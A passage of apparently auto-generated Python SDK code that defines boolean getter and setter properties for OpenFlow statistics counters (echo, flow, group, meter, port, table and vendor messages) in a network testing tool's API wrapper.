# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRepliesTx"], value)
@property
def EchoRequestsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Requests Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRequestsRx"])
@EchoRequestsRx.setter
def EchoRequestsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRequestsRx"], value)
@property
def EchoRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRequestsTx"])
@EchoRequestsTx.setter
def EchoRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRequestsTx"], value)
@property
def ErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["ErrorsRx"])
@ErrorsRx.setter
def ErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["ErrorsRx"], value)
@property
def ExperimenterErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Experimenter Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["ExperimenterErrorsRx"])
@ExperimenterErrorsRx.setter
def ExperimenterErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["ExperimenterErrorsRx"], value)
@property
def FeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FeatureRepliesRx"])
@FeatureRepliesRx.setter
def FeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FeatureRepliesRx"], value)
@property
def FeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FeatureRequestsTx"])
@FeatureRequestsTx.setter
def FeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FeatureRequestsTx"], value)
@property
def FlowAddsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Adds Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowAddsTx"])
@FlowAddsTx.setter
def FlowAddsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowAddsTx"], value)
@property
def FlowAggregateStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Aggregate Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowAggregateStatRepliesRx"])
@FlowAggregateStatRepliesRx.setter
def FlowAggregateStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowAggregateStatRepliesRx"], value)
@property
def FlowAggregateStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Aggregate Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowAggregateStatRequestsTx"])
@FlowAggregateStatRequestsTx.setter
def FlowAggregateStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowAggregateStatRequestsTx"], value)
@property
def FlowDelsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Dels Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowDelsTx"])
@FlowDelsTx.setter
def FlowDelsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowDelsTx"], value)
@property
def FlowModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowModErrorsRx"])
@FlowModErrorsRx.setter
def FlowModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowModErrorsRx"], value)
@property
def FlowModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowModsTx"])
@FlowModsTx.setter
def FlowModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowModsTx"], value)
@property
def FlowRateflowssec(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Rate (flows/sec)
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowRateflowssec"])
@FlowRateflowssec.setter
def FlowRateflowssec(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowRateflowssec"], value)
@property
def FlowRemovesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Removes Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowRemovesRx"])
@FlowRemovesRx.setter
def FlowRemovesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowRemovesRx"], value)
@property
def FlowStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowStatRepliesRx"])
@FlowStatRepliesRx.setter
def FlowStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowStatRepliesRx"], value)
@property
def FlowStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowStatRequestsTx"])
@FlowStatRequestsTx.setter
def FlowStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowStatRequestsTx"], value)
@property
def GetAsynchronousConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Asynchronous Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRepliesRx"])
@GetAsynchronousConfigRepliesRx.setter
def GetAsynchronousConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRepliesRx"], value)
@property
def GetAsynchronousConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Asynchronous Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRequestsTx"])
@GetAsynchronousConfigRequestsTx.setter
def GetAsynchronousConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRequestsTx"], value)
@property
def GetConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetConfigRepliesRx"])
@GetConfigRepliesRx.setter
def GetConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetConfigRepliesRx"], value)
@property
def GetConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetConfigRequestsTx"])
@GetConfigRequestsTx.setter
def GetConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetConfigRequestsTx"], value)
@property
def GetQueueConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Queue Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetQueueConfigRepliesRx"])
@GetQueueConfigRepliesRx.setter
def GetQueueConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetQueueConfigRepliesRx"], value)
@property
def GetQueueConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Queue Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetQueueConfigRequestsTx"])
@GetQueueConfigRequestsTx.setter
def GetQueueConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetQueueConfigRequestsTx"], value)
@property
def GroupAddsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Adds Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupAddsTx"])
@GroupAddsTx.setter
def GroupAddsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupAddsTx"], value)
@property
def GroupDelsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Dels Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupDelsTx"])
@GroupDelsTx.setter
def GroupDelsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupDelsTx"], value)
@property
def GroupDescRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Desc Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupDescRepliesRx"])
@GroupDescRepliesRx.setter
def GroupDescRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupDescRepliesRx"], value)
@property
def GroupDescRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Desc Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupDescRequestsTx"])
@GroupDescRequestsTx.setter
def GroupDescRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupDescRequestsTx"], value)
@property
def GroupFeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupFeatureRepliesRx"])
@GroupFeatureRepliesRx.setter
def GroupFeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupFeatureRepliesRx"], value)
@property
def GroupFeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupFeatureRequestsTx"])
@GroupFeatureRequestsTx.setter
def GroupFeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupFeatureRequestsTx"], value)
@property
def GroupModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupModErrorsRx"])
@GroupModErrorsRx.setter
def GroupModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupModErrorsRx"], value)
@property
def GroupModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupModsTx"])
@GroupModsTx.setter
def GroupModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupModsTx"], value)
@property
def GroupStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupStatRepliesRx"])
@GroupStatRepliesRx.setter
def GroupStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupStatRepliesRx"], value)
@property
def GroupStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupStatRequestsTx"])
@GroupStatRequestsTx.setter
def GroupStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupStatRequestsTx"], value)
@property
def HelloErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Hello Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["HelloErrorsRx"])
@HelloErrorsRx.setter
def HelloErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["HelloErrorsRx"], value)
@property
def HellosRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Hellos Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["HellosRx"])
@HellosRx.setter
def HellosRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["HellosRx"], value)
@property
def HellosTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Hellos Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["HellosTx"])
@HellosTx.setter
def HellosTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["HellosTx"], value)
@property
def InstructionErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Instruction Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["InstructionErrorsRx"])
@InstructionErrorsRx.setter
def InstructionErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["InstructionErrorsRx"], value)
@property
def MatchErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Match Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MatchErrorsRx"])
@MatchErrorsRx.setter
def MatchErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MatchErrorsRx"], value)
@property
def MeterAddsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Adds Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterAddsTx"])
@MeterAddsTx.setter
def MeterAddsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterAddsTx"], value)
@property
def MeterConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterConfigRepliesRx"])
@MeterConfigRepliesRx.setter
def MeterConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterConfigRepliesRx"], value)
@property
def MeterConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterConfigRequestsTx"])
@MeterConfigRequestsTx.setter
def MeterConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterConfigRequestsTx"], value)
@property
def MeterDelsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Dels Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterDelsTx"])
@MeterDelsTx.setter
def MeterDelsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterDelsTx"], value)
@property
def MeterFeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterFeatureRepliesRx"])
@MeterFeatureRepliesRx.setter
def MeterFeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterFeatureRepliesRx"], value)
@property
def MeterFeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterFeatureRequestsTx"])
@MeterFeatureRequestsTx.setter
def MeterFeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterFeatureRequestsTx"], value)
@property
def MeterModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterModErrorsRx"])
@MeterModErrorsRx.setter
def MeterModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterModErrorsRx"], value)
@property
def MeterModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterModsTx"])
@MeterModsTx.setter
def MeterModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterModsTx"], value)
@property
def MeterStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterStatRepliesRx"])
@MeterStatRepliesRx.setter
def MeterStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterStatRepliesRx"], value)
@property
def MeterStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterStatRequestsTx"])
@MeterStatRequestsTx.setter
def MeterStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterStatRequestsTx"], value)
@property
def OfChannelConfigured(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Configured
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelConfigured"])
@OfChannelConfigured.setter
def OfChannelConfigured(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelConfigured"], value)
@property
def OfChannelConfiguredUp(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Configured Up
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelConfiguredUp"])
@OfChannelConfiguredUp.setter
def OfChannelConfiguredUp(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelConfiguredUp"], value)
@property
def OfChannelFlapCount(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Flap Count
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelFlapCount"])
@OfChannelFlapCount.setter
def OfChannelFlapCount(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelFlapCount"], value)
@property
def OfChannelLearnedUp(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Learned Up
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelLearnedUp"])
@OfChannelLearnedUp.setter
def OfChannelLearnedUp(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelLearnedUp"], value)
@property
def PacketInsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Packet Ins Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketInsRx"])
@PacketInsRx.setter
def PacketInsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketInsRx"], value)
@property
def PacketOutsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Packet Outs Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketOutsTx"])
@PacketOutsTx.setter
def PacketOutsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketOutsTx"], value)
@property
def PacketinReasonAction(self):
# type: () -> bool
"""
Returns
-------
- bool: PacketIn Reason Action
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketinReasonAction"])
@PacketinReasonAction.setter
def PacketinReasonAction(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketinReasonAction"], value)
@property
def PacketinReasonInvalidTTL(self):
# type: () -> bool
"""
Returns
-------
- bool: PacketIn Reason Invalid TTL
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketinReasonInvalidTTL"])
@PacketinReasonInvalidTTL.setter
def PacketinReasonInvalidTTL(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketinReasonInvalidTTL"], value)
@property
def PacketinReasonNoMatch(self):
# type: () -> bool
"""
Returns
-------
- bool: PacketIn Reason No Match
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketinReasonNoMatch"])
@PacketinReasonNoMatch.setter
def PacketinReasonNoMatch(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketinReasonNoMatch"], value)
@property
def PortDescRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Desc Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortDescRepliesRx"])
@PortDescRepliesRx.setter
def PortDescRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortDescRepliesRx"], value)
@property
def PortDescRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Desc Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortDescRequestsTx"])
@PortDescRequestsTx.setter
def PortDescRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortDescRequestsTx"], value)
@property
def PortModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortModErrorsRx"])
@PortModErrorsRx.setter
def PortModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortModErrorsRx"], value)
@property
def PortModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortModsTx"])
@PortModsTx.setter
def PortModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortModsTx"], value)
@property
def PortName(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Name
"""
return self._get_attribute(self._SDM_ATT_MAP["PortName"])
@PortName.setter
def PortName(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortName"], value)
@property
def PortStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortStatRepliesRx"])
@PortStatRepliesRx.setter
def PortStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortStatRepliesRx"], value)
@property
def PortStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortStatRequestsTx"])
@PortStatRequestsTx.setter
def PortStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortStatRequestsTx"], value)
@property
def PortStatusesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Statuses Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortStatusesRx"])
@PortStatusesRx.setter
def PortStatusesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortStatusesRx"], value)
@property
def QueueOpErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Queue Op Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["QueueOpErrorsRx"])
@QueueOpErrorsRx.setter
def QueueOpErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["QueueOpErrorsRx"], value)
@property
def QueueStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Queue Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["QueueStatRepliesRx"])
@QueueStatRepliesRx.setter
def QueueStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["QueueStatRepliesRx"], value)
@property
def QueueStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Queue Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["QueueStatRequestsTx"])
@QueueStatRequestsTx.setter
def QueueStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["QueueStatRequestsTx"], value)
@property
def RequestErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Request Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["RequestErrorsRx"])
@RequestErrorsRx.setter
def RequestErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RequestErrorsRx"], value)
@property
def RoleRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Role Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["RoleRepliesRx"])
@RoleRepliesRx.setter
def RoleRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RoleRepliesRx"], value)
@property
def RoleRequestErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Role Request Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["RoleRequestErrorsRx"])
@RoleRequestErrorsRx.setter
def RoleRequestErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RoleRequestErrorsRx"], value)
@property
def RoleRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Role Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["RoleRequestsTx"])
@RoleRequestsTx.setter
def RoleRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RoleRequestsTx"], value)
@property
def SetAsynchronousConfigTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Set Asynchronous Config Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["SetAsynchronousConfigTx"])
@SetAsynchronousConfigTx.setter
def SetAsynchronousConfigTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["SetAsynchronousConfigTx"], value)
@property
def SetConfigTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Set Config Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["SetConfigTx"])
@SetConfigTx.setter
def SetConfigTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["SetConfigTx"], value)
@property
def StatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["StatRepliesRx"])
@StatRepliesRx.setter
def StatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["StatRepliesRx"], value)
@property
def StatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["StatRequestsTx"])
@StatRequestsTx.setter
def StatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["StatRequestsTx"], value)
@property
def SwitchConfigErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Switch Config Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["SwitchConfigErrorsRx"])
@SwitchConfigErrorsRx.setter
def SwitchConfigErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["SwitchConfigErrorsRx"], value)
@property
def TableFeatureErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Feature Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableFeatureErrorsRx"])
@TableFeatureErrorsRx.setter
def TableFeatureErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableFeatureErrorsRx"], value)
@property
def TableFeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableFeatureRepliesRx"])
@TableFeatureRepliesRx.setter
def TableFeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableFeatureRepliesRx"], value)
@property
def TableFeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableFeatureRequestsTx"])
@TableFeatureRequestsTx.setter
def TableFeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableFeatureRequestsTx"], value)
@property
def TableModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableModErrorsRx"])
@TableModErrorsRx.setter
def TableModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableModErrorsRx"], value)
@property
def TableModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableModsTx"])
@TableModsTx.setter
def TableModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableModsTx"], value)
@property
def TableStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableStatRepliesRx"])
@TableStatRepliesRx.setter
def TableStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableStatRepliesRx"], value)
@property
def TableStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Table Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["TableStatRequestsTx"])
@TableStatRequestsTx.setter
def TableStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["TableStatRequestsTx"], value)
@property
def VendorMessagesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Messages Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorMessagesRx"])
@VendorMessagesRx.setter
def VendorMessagesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["VendorMessagesRx"], value)
@property
def VendorMessagesTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Messages Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorMessagesTx"])
@VendorMessagesTx.setter
def VendorMessagesTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["VendorMessagesTx"], value)
@property
def VendorStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorStatRepliesRx"])
@VendorStatRepliesRx.setter
def VendorStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["VendorStatRepliesRx"], value)
@property
def VendorStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Vendor Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["VendorStatRequestsTx"])
@VendorStatRequestsTx.setter
def VendorStatRequestsTx(self, value):
# type: (bool) -> None
